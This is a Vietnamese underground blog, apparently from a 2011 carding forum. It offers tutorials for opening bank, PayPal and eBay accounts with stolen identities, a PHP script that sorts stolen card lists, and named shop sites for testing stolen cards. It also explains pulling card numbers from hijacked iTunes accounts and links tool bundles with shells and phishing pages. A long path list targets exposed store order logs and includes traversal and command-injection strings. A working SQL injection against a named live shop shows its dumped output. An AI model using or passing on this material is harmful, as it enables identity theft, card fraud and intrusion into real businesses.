Hiển thị các bài đăng có nhãn UG. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn UG. Hiển thị tất cả bài đăng

Chủ Nhật, 20 tháng 11, 2011

Một số kinh nghiệm về PAYPAL và Ebay

Hôm nay mạo muội xin đóng góp anh em một số kinh nghiệm mà mình rút ra đc về Paypal và Ebay.

Đầu tiên để reg acc Paypal thì cần có 1 bank us. Trước nay hầu như anh em đều dùng Wachovia để verify PP nhưng gần đây khó reg và reg đc thì verify PP sau 1 tuần sẽ limit ko lý do.
Mình sẽ hướng dẫn 1 cách reg bank mà ko đụng hàng ai cả, và có rất nhiều site cho anh em chọn, tất cả đều ở GOOGLE.COM
Anh em chuẩn bị 1 SSH pri, 1 Full info chuẩn, 1 phone in.

1. US BANK ACCOUNT
Lâu nay mọi người đều nghĩ phải vào site của bank nào đó dùng full info để reg, reg trực tiếp như thế sẽ khó hơn. Tại sao ko kiếm 1 thằng trung gian nó reg hộ cho?
Bạn vào google.com search với từ khóa "Prepaid cards"+"free checking account"
Nó sẽ ra 1 đống site để lựa chọn, mình từg reg nhiều rồi và đưa ra 1 lựa chọn là site upsidecard.com
Anh em ko nhất thiết phải chọn thằng này. có rất nhiều thằng khác để lựa chọn.

Với những thằng này bạn chỉ cần 1 full info có SSN và DOB chuẩn, sẽ qua đc ngay. Mình thường dùng ssh reg để sau này còn login vào, login bằng nhiều ip sẽ bị lock.
1 kinh nghiệm nhỏ là những site thế này nó ko check avs, cho nên anh em có thể giả vờ viết sau cái địa chỉ, để nó gửi card về thằng chủ thẻ nó ko nhận đc và ko report lên bank, acc pp sẽ sống dai hơn.

Sau khi reg xong bạn sẽ có 1 bank info và 1 card info gồm CCnumber exp date và CV2 kèm theo 1 user login vào site đó để check bank.
Có đc bank rồi, bây giờ vào paypal để reg thôi.
NOTE: Từ cái việc mấy site này nó ko check address, nếu bạn nào có drop thì có thể điền address drop vào nhận card, sau khi có card thì dùng chính phone reg bank đó call lên để active card. Và có thể dùng luôn bank đó để withdraw tiền luôn. Nhờ drop rút tiền hộ.

2. US PAYPAL ACCOUNT.
Mình khuyên là nên có 1 phone in trước khi chuẩn bị reg tất cả các thứ này, 1 phone in cố định, sau này còn cần cho pp và ebay.
Vào Paypal và reg acc premier như bình thường.
Reg paypal xong confirm email và add bank. bạn điền bank info vừa nhận đc ở site prepaid card vào và next. Những bank kiểu này PP thường sẽ ko cho verify instant mà bắt buộc bạn phải để paypal deposit 2 small amount vào bank. Cũng có trường hợp cho verify instant nhưng bạn cũng ko có user id để verify kiểu này, user id lúc reg bank đấy là user id của prepaid card ko phải của bank.
Sau khi add bank bạn chờ 1 2 hôm, thường tầm 24h thì vào site reg bank đó check sẽ có 2 small amount rồi, vào view transaction ( view history) để xem.
Sau khi có đc 2 small của pp rồi vào vào pp để điền vào thôi. Bây giờ bạn đã có 1 Paypal US verified.
Thông thường verify pp kiểu này pp sẽ tốt hơn, ít bị limit vớ vẩn hơn. ( theo kinh nghiệm của mình)

3. US EBAY ACCOUNT
Cũng là info đấy giờ vào ebay.com, nhấn vào register reg với info đấy và phone in đã chuẩn bị từ trước. Mình thường reg bank xong vào reg luôn ebay và paypal cùng lúc, chờ 1 2 hôm sau verify paypal xong lúc đấy acc ebay cũng đã đc 1 vài hôm rồi, tỷ lệ rủi ro khi list là thấp hơn.
Đối với ebay thì mình thấy cái address khá quan trọng, nếu address đó đc reg nhiều ebay rồi và các acc dùng address đấy bị suspend hoặc có past due thì bạn sẽ sớm bị suspend sau khi list hàng.
Nếu bạn reg ebay xong và nó đòi verify identity ngay lập tức, thì nên quên nó luôn.
Nếu reg xong thấy ok thì cứ để đấy tầm vài hôm, verify paypal xong vào ebay link con paypal đấy vào. đợi 1 2 hôm vào giả vờ list 1 item, create seller account và save for later. chưa list hàng ngay. Lúc này bạn sẽ phải verify identity, nó sẽ call vào phone in và điền pin code vào.
Sau khi có acc seller rồi mình thường để thêm vài hôm nữa mới list. cho chắc ăn. không đi đâu mà phải vội, thà chờ 1 tuần để có acc ngon còn hơn thử hàng tháng không đc acc nào.

UPDATE: Đối với Ebay thì cookie cũng quan trọng nhé. mình thường dùng máy ảo để làm hết những việc này, và 1 trình duyệt riêng để login ebay, ko xóa history và cookie.

NOTE: Lúc reg bank mình ko điền address thật của info, thường giả vờ điền sai 1 tí  vì nó ko check address khớp với cái ssn hay ko  và cái address đó vô tình có thể sẽ clear với paypal và ebay. Mình thường dùng luôn cái address mà trước đó giả vờ điền sai để reg luôn paypal và ebay.
Xong rồi nhé  Anh em nào thấy có ích cho bản thân thanks phát nào
================================================== ==============================
Mình không hide, hy vọng anh em tôn trọng bản quyền không lech qua bất cứ chỗ nào khác.
VikApple - VNC 

Chủ Nhật, 16 tháng 10, 2011

Domain .vn

Cái này mình tự tìm ra. Domain cũng reg dc 1 thời gian oy vẫn live nên viết bài này cho ae chém nó nhiệt tình
ccv
Sock từa lưa nhưng cứ trùng cho nó ăn chắc, tầm 1-2 tuần mới có mail báo live
nếu live thì nên dùng luôn dns của nó. muốn đổi dns trung gian thì phải mất thêm 100$ nữa. nhưng xài của nó cũng ngon
Demo : vdictn.vn
http://whois.domaintools.com/vdictn.vn
victim : www.united-domains.de
proof



Thứ Hai, 29 tháng 8, 2011

Code lọc CC trùng, Phân loại CC

Thấy anh em dạo này nổi nên vấn đề lọc trùng cc.
Trước đây vấn đề này được giải quyết rồi. Mình có code này do Winjin code và mình edit. Code ổn định.
Chức năng:

    Lọc trùng : cc trùng sẽ auto bị remove. Ko cần config vị trí cc number
    Phân loại CC
    Tìm cc theo bin

Highslide JS
Highslide JS

<?php
/*
+ Coded by: Neverbestboy & WinJin92 (Edited by Gaconit)
*/
function findcc($str){
    $str=str_replace(" ","",$str);
    for($i=0;$i<=strlen($str);$i++){
        if(is_numeric($str[$i])){
            $ccNum.=$str[$i];
            if(strlen($ccNum)>14){
              return $ccNum;
              break;
            };
        }
        else $ccNum='';
    }

}
if($_POST['concaocao']){
  if(strpos($_POST['concaocao'], '.txt')){
  // Use TXT FILE
  $data  =  file_get_contents($_POST['concaocao']);
  $data  =  explode(chr(13).chr(10),$data);
  }
  else{
  /* USE POST WAY */
  $data  =  $_POST['concaocao'];
  $data  =  explode("\r\n",$data); // Work only in Window
  echo '<b>Total: </b>'.count($data).'<hr>';
  }
  foreach($data as $key => $value)
  {
        $ccNum=findcc($value);
        if(!$check["$ccNum"]){
            $check["$ccNum"]  =  1;

            if($_POST['binfilter']){
              $type  =  substr($ccNum,0,strlen($_POST['binfilter']));
              if($type == $_POST['binfilter'])
              {
              $cc['bin'][]  =  array($value);
              }
            }
            else
            {
              $type  =  substr($ccNum,0,1);
              if($type == 3)
              {
              $cc['amex'][]  =  array($value);
              }
              elseif($type == 4)
              {
              $cc['visa'][]  =  array($value);
              }
              elseif($type == 5)
              {
              $cc['master'][]  =  array($value);
              }
              elseif($type == 6)
              {
              $cc['discover'][]  =  array($value);
              }
            }
            $html.="$value\r\n";
            $nhtml++;
    }

}
  $cols = '100%';
  $rows = '5';
  if(!$_POST['binfilter']){
  echo '<pre><b>Amex: </b>'.count($cc['amex']).'<Br><textarea cols="'.$cols.'" rows="'.$rows.'">';
  if(count($cc['amex']))foreach($cc['amex'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  echo '</textarea></pre>';
  //
  echo '<pre><b>Visa: </b>'.count($cc['visa']).'<Br><textarea cols="'.$cols.'" rows="'.$rows.'">';
  if(count($cc['visa']))foreach($cc['visa'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  echo '</textarea></pre>';
  //
  echo '<pre><b>Master: </b>'.count($cc['master']).'<Br><textarea cols="'.$cols.'" rows="'.$rows.'">';
  if(count($cc['master']))foreach($cc['master'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  echo '</textarea></pre>';
  //
  echo '<pre><b>Discover: </b>'.count($cc['discover']).'<Br><textarea cols="'.$cols.'" rows="'.$rows.'">';
  if(count($cc['discover']))foreach($cc['discover'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  echo '</textarea></pre>';
  }
  else{
    echo '<pre><b>BIN: </b>'.count($cc['bin']).'<Br><textarea cols="'.$cols.'" rows="'.$rows.'">';
  foreach($cc['bin'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  echo '</textarea></pre>';
  }
  echo '<pre><b>All with order:</b>'.$nhtml.'<Br><textarea cols="'.$cols.'" rows="'.$rows.'">';
  if(count($cc['amex']))foreach($cc['amex'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  if(count($cc['visa']))foreach($cc['visa'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  if(count($cc['master']))foreach($cc['master'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  if(count($cc['discover']))foreach($cc['discover'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  echo '</textarea></pre>';

    echo '<pre><b>All: </b>'.$nhtml.'<Br><textarea cols="'.$cols.'" rows="'.$rows.'">';
    echo $html;
    echo '</textarea></pre>';
}
else{
?>
<html>
<title>CC Filter - WinJin92</title>
<center><b>Coded by: WinJin92 & Helper: Neverbestboy [Ver: 2] (Edited by gaconit)</b></center>
<form method="POST" action="?">
<textarea name="concaocao" cols="80" rows="20"></textarea><br>
<b>Warning: </b> Fill "filename" to include cc list from "filename" (cc.txt) Or Paste you CC list to textarea above!<br>
<input type="text" name="binfilter" size="15" value="0"> <b>0</b> is disable BIN Filter!<br>
<br><input type="submit" value="Submit">
</form>
</html>
<? } ?>

Add một bank vào nhiều PayPal

Tut vẫn là tut và nó chính là Tut
Đã có nhiều bro bị limit acc pp + bank trong đó và tự hỏi làm sao add bank vào acc pp khác đây
Thực ra việc add bank vào PP dựa vào cái gì nhỉ
Thứ nhất account number => ko fake được
Thứ 2 swift code => fake thoải mái
Với VCB
http://forum.vietmaker.com/threads/19223-M%C3%A3-SWIFT-v%C3%A0-address-c%C3%A1c-chi-nh%C3%A1nh-c%E1%BB%A7a-VCB.
Vào site đó một đống swift code
Cứ nhập các swift code của các tỉnh khác vào, bảo đảm rút tiền vẫn về bank mình
Các ngân hàng khác các bác tự tìm swiftcode của chi nhánh
Riêng Đông Á mình có search qua mà hình như chỉ có 1 swiftcode


đơn giản là tìm swiftcode của các chi nhanh cùng bank rồi nhập vào thay cho swiftcode chính của bank
ví dụ như VCB thường nhập swift code là BFTVVNVX
thì thay vào đó ta nhập BFTVVNVX 019 (cà mau)
hoặc BFTVVNVX 015 (an giang)
vào google ra một đống đó

Check BL ccv bằng Authorize

ku Nic3 biếu mình 1 acc unlimited credit ở Nic3.biz mà bảo search paygate cho nó code tool mãi mà chưa search đc, hnay học xong rảnh ngồi search cho nó 1 tẹo, kiếm mãi chẳng ra site nào giống Gpal quay sang search Authorize cho ae ngồi mà check bl
chủ yếu share site là chính, cách check thì ai cũng biết rồi chẳng hide làm gì vì site ntn nhiều như cỏ dại duy nhất lưu ý anh em 1 điều: Authorize hold tiền ~> check xong để đó 2 - 3 ngày, sau 2 - 3 ngày check lại với balance nhỏ (tầm 10$), còn live thì hãy đem đi đâm. không biết cái này rồi lại có người bảo "check qua 1000$ mà đâm 50$ không qua" hoặc "hôm qua vừa check qua 2000$, hôm nay check lại 100$ cũng không qua"

site thì có nhiều, nhưng hầu hết đều giới hạn số lần check (thường là 5 lần), đưa ra ae lại ngại check tạm thời share 3 site không giới hạn số lần check đã, bao giờ ae fuck chán thì đưa tiếp

http://www.mightywallets.com/
http://www.tacticalpants.com/
http://www.tfsupplements.com/

Bank ver paypal

http://www.marketprosecure.com/meta-bank-card.html
(dork:"Metabank")
p/s: site này có vài cái hay lắm , ko phải chỉ là trang tổng hợp thôi đâu .

Anh em coi ai cần gì thì làm .Hihihi

Lấy CC number từ Apple Account

+ Tut rất phù hợp với bé nào check dc acc vs là acc paypal vs là acc Itunes mà lại bị dính ver card


Cũng đơn giản thôi. Trước trong 1 lần check mailpass, gặp được vài cái Mail có tài khoản Paypal, nhưng do SOCK kém lên bị PP bắt Veriy bằng số thẻ CC.Mình quay lại kiểm trả inbox và thấy chủ Mail còn có Acc iTune, vào iTune thì thấy 4 số cuối trùng với 4 số của Paypal - nghĩa là cùng 1 thẻ.
Bước 1: - Change Country. Giả sử Acc đang là US thì đổi sang UK chẳng hạn. Sau đó nó sẽ xác nhận mấy cái điều khoản này nó. Đồng ý rồi ấn Ok là xong. Lúc này thường thì nó sẽ chuyển ta vào trang Edit Payment vì khi đó thông tin thanh toán không còn Match với Bank nữa. Nếu vì lý do nào đó nó không tự động thì ta vào trang quản ly Account ấn vào Edit Payment Infomation, lúc này số thẻ vẫn chưa hiện ra, ta đừng thay đổi gì cả mà cứ ấn vào cái nút Done Khi đó iTune nó sẽ báo lỗi địa chỉ và show hết cả số thẻ ra. Tất nhiên nó không Show CV2 :nonnay:
Highslide JS
Highslide JS
Highslide JS
Highslide JS
Highslide JS
Bước 2: Copy số thẻ thôi chứ còn gì nữa

Scan Credit Card

Tất cả những thứ bạn nên có để scan CC
Nguyên liệu gồm có: bộ font, file PSD, file PDF eng và vn ae tha hồ vọc
Các mẫu tem, mẫu logo...
Cũng tạm ổn nhỉ
Và rất nhiều thứ tớ sưu tầm để hết trong này anh em down về dùng thử nhé
http://www.mediafire.com/?dklkys1m2nqux7o
Ghi nhớ : Tut trong PDF là tut làm 1 scan mới chứ không phải chỉnh sửa, tuy nhiên đọc hết ae đem những mẫu có sẵn edit cũng đc
44MB lận, ae từ từ mà down
Thank nhé!

ALL Tools Hack Shop & Tuts Shipped

Đi lòng vòng trên GG thì thấy cái này hay hay nên Leech về Share cho anh em Newbie. Mong rằng sẽ không trùng bài với ai! Ai thấy có ích thì cho xin cái THANK nha!

*Bộ Tools & Tuts được tổng hợp từ:
+ HKV Group
+ Newbie Group
+ DF Group
+ Google.com
........




Gồm có:
- Pangolin 3.0.01011
- darkMSSQL, darkMySQLi & darkjumper của darkc0de
- Havij 1.1
- MySQLi Dumper 3.6
- Web Cruiser Ent 2.1
- sqliHelper 2.7
- GH MD5 Cracker 1.0
- Admin Finder 1.0
- Exploit scanner 1.0
- prj Site Hack 1.0
- Blues Port Scan 5.0.2.1265
- M4xmssql & M4xmysql 1.0
- Tools Lọc EXP & Lọc Trùng
- String - ASCII, HEX, Binary Converter
- PeCompact - Unpacker, PEiD & OLLYDBG
- 140 shells của Xgr0up
- Passwords Pro 3.0
- RC4
- CC2Bank 1.3
- BSQL Hacker 9.0.0.7
- JSky Enterprise Edition 1.5.0.153
- HTTP request testing 1.0
- Encoder 1.0
- Demon - scan sub-domains 1.1
- Brute Force Test 1.0
- IIS Put Scanner 1.3
- Mars Banks Base 1.1
- Jet SQL Injection 2.5
- Edjpgcom (run file .php.jpg)
- All Phishing Pages
- SSH socks
- Photoshop (CreditCard, DriverLicense & Passport)

Và một số Tuts tổng hợp khác....
Tools:
SSH socks:
Photoshop:
All Phishing Pages:
Tuts:
Hacking:
Bin:
Doman-Hosting-Server-Reseller:
Jewelleries-Clothes-Chocolate:
Electroníc:
Other Tutorials:
Pass giải nén: forlornhope
Link Download: http://www.mediafire.com/?cqhjujdzmud

Hack CC bằng google

/~gcw/cgi-bin/Count.cgi?df=callcard.dat
/cgi-bin/PDG_Cart/shopper.conf
/cgi-local/PDG_Cart/shopper.conf
/cgi-bin/PDG_Cart/order.log
/PDG_Cart/order.log
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/Count.cgi?df=callcard.dat
/cgi/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/cgi-bin/PDG_Cart/mc.txt
/PDG/order.txt
/cgi-bin/PDG_cart/card.txt
/PDG_Cart/shopper.conf
/php/mlog.phtml
/php/mylog.phtml
/webcart/carts
/cgi-bin/orders.txt
/WebShop/logs
/cgi-bin/AnyForm2
/cgi-bin/mc.txt
/ccbill/secure/ccbill.log
/cgi-bin/orders/mc.txt
/WebCart/orders.txt
/cgi-bin/orders/cc.txt
/cvv2.txt
/cgi-bin/orderlog.txt
/WebShop/logs
/orderb/shop.mdb
/_private/shopping_cart.mdb
/scripts/iisadmin/tools/mkilog.exe
/cool-logs/mylog.html
/cool-logs/mlog.html
/easylog/easylog.html
/HyperStat/stat_what.log
/mall_log_files/
/scripts/weblog
/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
/super_stats/access_logs
/trafficlog
/wwwlog
/Admin_files/order.log
/bin/orders/orders.txt
/cgi/orders/orders.txt
/cgi-bin/orders/orders.txt
/cgi-sys/orders/orders.txt
/cgi-local/orders/orders.txt
/htbin/orders/orders.txt
/cgibin/orders/orders.txt
/cgis/orders/orders.txt
/scripts/orders/orders.txt
/cgi-win/orders/orders.txt
/bin/pagelog.cgi
/cgi/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-sys/pagelog.cgi
/cgi-local/pagelog.cgi
/cgibin/pagelog.cgi
/cgis/pagelog.cgi
/scripts/pagelog.cgi
/cgi-win/pagelog.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/cgibin/DCShop/auth_data/auth_user_file.txt
/cgis/DCShop/auth_data/auth_user_file.txt
/scripts/DCShop/auth_data/auth_user_file.txt
/cgi-win/DCShop/auth_data/auth_user_file.txt
/bin/DCShop/orders/orders.txt
/cgi/DCShop/orders/orders.txt
/cgi-bin/DCShop/orders/orders.txt
/cgi-sys/DCShop/orders/orders.txt
/cgi-local/DCShop/orders/orders.txt
/htbin/DCShop/orders/orders.txt
/cgibin/DCShop/orders/orders.txt
/cgis/DCShop/orders/orders.txt
/scripts/DCShop/orders/orders.txt
/cgi-win/DCShop/orders/orders.txt
/dc/auth_data/auth_user_file.txt
/dcshop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/orders/checks.txt
/orders/mountain.cfg
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/webcart/carts
/webcart-lite/orders/import.txt
/webcart/config
/webcart/config/clients.txt
/webcart/orders
/webcart/orders/import.txt
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/bin/shop/auth_data/auth_user_file.txt
/cgi/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-sys/shop/auth_data/auth_user_file.txt
/cgi-local/shop/auth_data/auth_user_file.txt
/htbin/shop/auth_data/auth_user_file.txt
/cgibin/shop/auth_data/auth_user_file.txt
/cgis/shop/auth_data/auth_user_file.txt
/scripts/shop/auth_data/auth_user_file.txt
/cgi-win/shop/auth_data/auth_user_file.txt
/bin/shop/orders/orders.txt
/cgi/shop/orders/orders.txt
/cgi-bin/shop/orders/orders.txt
/cgi-sys/shop/orders/orders.txt
/cgi-local/shop/orders/orders.txt
/htbin/shop/orders/orders.txt
/cgibin/shop/orders/orders.txt
/cgis/shop/orders/orders.txt
/scripts/shop/orders/orders.txt
/cgi-win/shop/orders/orders.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin/shop.pl/page=;cat%20shop.pl
/cgi-sys/shop.pl/page=;cat%20shop.pl
/cgi-local/shop.pl/page=;cat%20shop.pl
/htbin/shop.pl/page=;cat%20shop.pl
/cgibin/shop.pl/page=;cat%20shop.pl
/cgis/shop.pl/page=;cat%20shop.pl
/scripts/shop.pl/page=;cat%20shop.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/webcart-lite/orders/import.txt
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/cgis/cart.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/cgis/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/bin/cart32.exe
/cgi/cart32.exe
/cgi-bin/cart32.exe
/cgi-sys/cart32.exe
/cgi-local/cart32.exe
/htbin/cart32.exe
/cgibin/cart32.exe
/cgis/cart32.exe
/scripts/cart32.exe
/cgi-win/cart32.exe
/cgi-bin/www-sql;;;
/server%20logfile;;;
/cgi-bin/pdg_cart/order.log
/cgi-bin/shopper.exe?search
/orders/order.log
/orders/import.txt
/orders/checks.txt
/orders/orders.txt
/Orders/order.log
/order/order.log
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/_private/orders.txt
/_private/orders.htm
/orders/mountain.cfg
/PDG_Cart/shopper.config
/Admin_files/order.log
/mall_log_files/order.log
/PDG_Cart/order.log
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=;;;
/_private/shopping_cart.mdb
/cgi-bin/shopper.cgi
/cgi-bin/shop.cgi
/cgi-bin/perlshop.cgi
/cgi-bin/mall2000.cgi
/log/
/logfile/
/logfiles/
/logger/
/logging/
/logs/
/logs/access_log
/weblog/
/weblogs/
/cgi-bin/loadpage.cgi
/database/
/databases/
/cgi-bin/Web_Store/web_store.cgi
/scripts/cart32.exe
/scripts/c32web.exe
/cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/cart32/whatever-OUTPUT.txt
/cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
/derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
/ccbill/secure/ccbill.log
/cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv
/order13.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin/PDG_Cart/order.log
/cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log
/orders/db/zzzbizorders.log.html
/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other
isinglogorder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order.log
/cgi-bin/shopper.exe?preadd=action&key=bajk390ss&template=order.log
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/cart32/CART32-order.txt
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
/cgi-bin/cart32.ini
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/cart32.exe/error
/metacart/database/metacart.mdb
//shopping/database/metacart.mdb
/shopping/database/metacart.mdb
/fpdb/shop.mdb
/cgi-bin/shopper.cgi?keywords=usstick&search=action&template=order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=order.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sales.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sell.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin_files.log
/cgi-bin/shopper.cgi?keywords=usstick&search=action&template=order.log
/cgi-bin/shopper.cgi?keywords=psiber&search=action&template=order.log
/cgi-bin/shopper.cgi?keywords=9461&search=action&template=order.log
/cgi-bin/shopper.cgi?keywords=SC7021&search=action&template=order.log
/cgi-bin/shopper.cgi?keywords=cc&search=action&template=order.log
/cgi-bin/shopper.cgi?keywords=order&search=action&template=order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.cgi?search=action&keywords=moron%20&template=shopper.conf
/Merchant2/modules/log/elf.mv?search=action&ORDERLOG.txt
/Merchant2/modules/log/malf.mv?search=action&ORDERLOG.txt
/cgi-bin/shopper.exe?search=action&keywords=CD006&template=sales.log
/cgi-bin/shopper.exe?search=action&keywords=***&template=sell.log
/cgi-bin/shopper.exe?search=action&keywords=order&template=admin.log
/cgi-bin/shopper.exe?search=action&keywords=cc&template=admin_files.log
/cgi-bin/shopper.exe?search=action&keywords=hack&template=order.log
/cgi-bin/shopper.exe?search=action&keywords=9400&template=order.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
/cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order.log
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/worlddirect/Web_store/Admin_files/order.log
/website/
/WebShop/templates/cc.txt
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/logs/
/WebShop/
/WebCart/orders.txt
/webcart/
/Web_store/Admin_files/order.log
/STORE/orders.txt
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/PSUser/PSCOErrPage.htm
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/PDG/order.txt
/orders/results
/Orders/orders.txt
/orders/order.log
/orders/mountain.cf
/orders/import.txt
/orders/import.txt
/orders/checks.txt
/orders/
/orders.txt
/orders.htm
/orderform/orders.txt
/order.txt
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper.exe?search=action&keywords=%20&template=shopper.conf
/cgi-bin/shopper.exe
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cgi-bin/perlshop.cgi
/cgi-bin/PDG_Cart/cc.log
/cgi-bin/orders/mc.txt
/cgi-bin/orders/cc.txt
/cgi-bin/orders.txt
/cgi-bin/orderlog.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00htm
/cgi-bin/ezmall2000/mall_log_files/order.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/cart32/CART32-order.txt
/cgi-bin/cart.pl
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/AdvWorks/equipment/catalog_type.asp
/Admin_files/order.log
/admin/Orders/orders.txt
/_private/shopping_cart.mdb

TUT mysql injection shop .html

Link error
http://perfumes.sthefani.com.br/miss-elysees-feminino-p-3375'.html
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') and p.products_quantity > 0 and p.products_status = '1' order by rand() limi' at line 1

select p.products_id, p.products_quantity, p.products_image, pd.products_name, p.products_price from all_products p left join all_products_description pd on pd.products_id = p.products_id and pd.language_id = '4' left join all_manufacturers m using(manufacturers_id) left join all_products_to_categories pc on pc.products_id = p.products_id where pc.categories_id = '6' and m.sthefani_manufacturers_status = '1' and p.manufacturers_id = '157' and p.products_id not in (3375\') and p.products_quantity > 0 and p.products_status = '1' order by rand() limit 4

[TEP STOP]


Nhiều bạn nghĩ đây là site .html thì chiến thế nào
Đơn giản cái đuôi .html chỉ là Rewrite URL dùng htaccess
Về bản chất cái site này là php vs mysql
Và với kinh nghiệm bản thân thì m biết cái source của site này là oscommerce
Và cái id bị lôi là products_id (nhìn ở p.products_id not in (3375\'))
Và Khai thác như bình thường thôi

Link exploit cho các bạn :
hxxp://perfumes.sthefani.com.br/miss-elysees-feminino-p-3375) and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5-- -.html
lorenzo_user@localhost : lorenzo_lojas : 5.0.92-community     lorenzo_user@localhost : lorenzo_lojas : 5.0.92-community
Mình làm tới đây thôi
Pro đi qua nhìn thấy thì Thanks e 1 cái nhé ^^

End tut

Tut crack tool fake cmnd 1.3

Đầu tiền là thành thực xin lỗi bác, em nghèo quá nên sinh ra đạo tặc.
Để chạy soft này cần cài đặt Netframework 4.0 và WindowsInstaller 3.1
link download
http://www.mediafire.com/?054sy4zo8dmrm6i
hoặc ở đây: http://www.mediafire.com/?nynzy1zcmml

Link soft fake CMND version 1.3
link download
http://www.mediafire.com/?jd1uv8a50i37szv
Trích từ bác phihoang
Để crack tải cương trình change hdd serial của ổ cứng
Change theo serial sau
Serie: 1C41DA2C1C41D
Change xong restart máy, và dùng key này để nhập vào. 116863aed1d3a95e75a994bc2f84430b
Tất cả quá trình đều rus as admin ( win7)
Complete đa xtest mãn nguyện:">

Thứ Tư, 23 tháng 3, 2011

TUT hack shop php mysql injection 5.0

victim: https://www.185elgin.com/customer_te...timonial_id=25'


Quote:

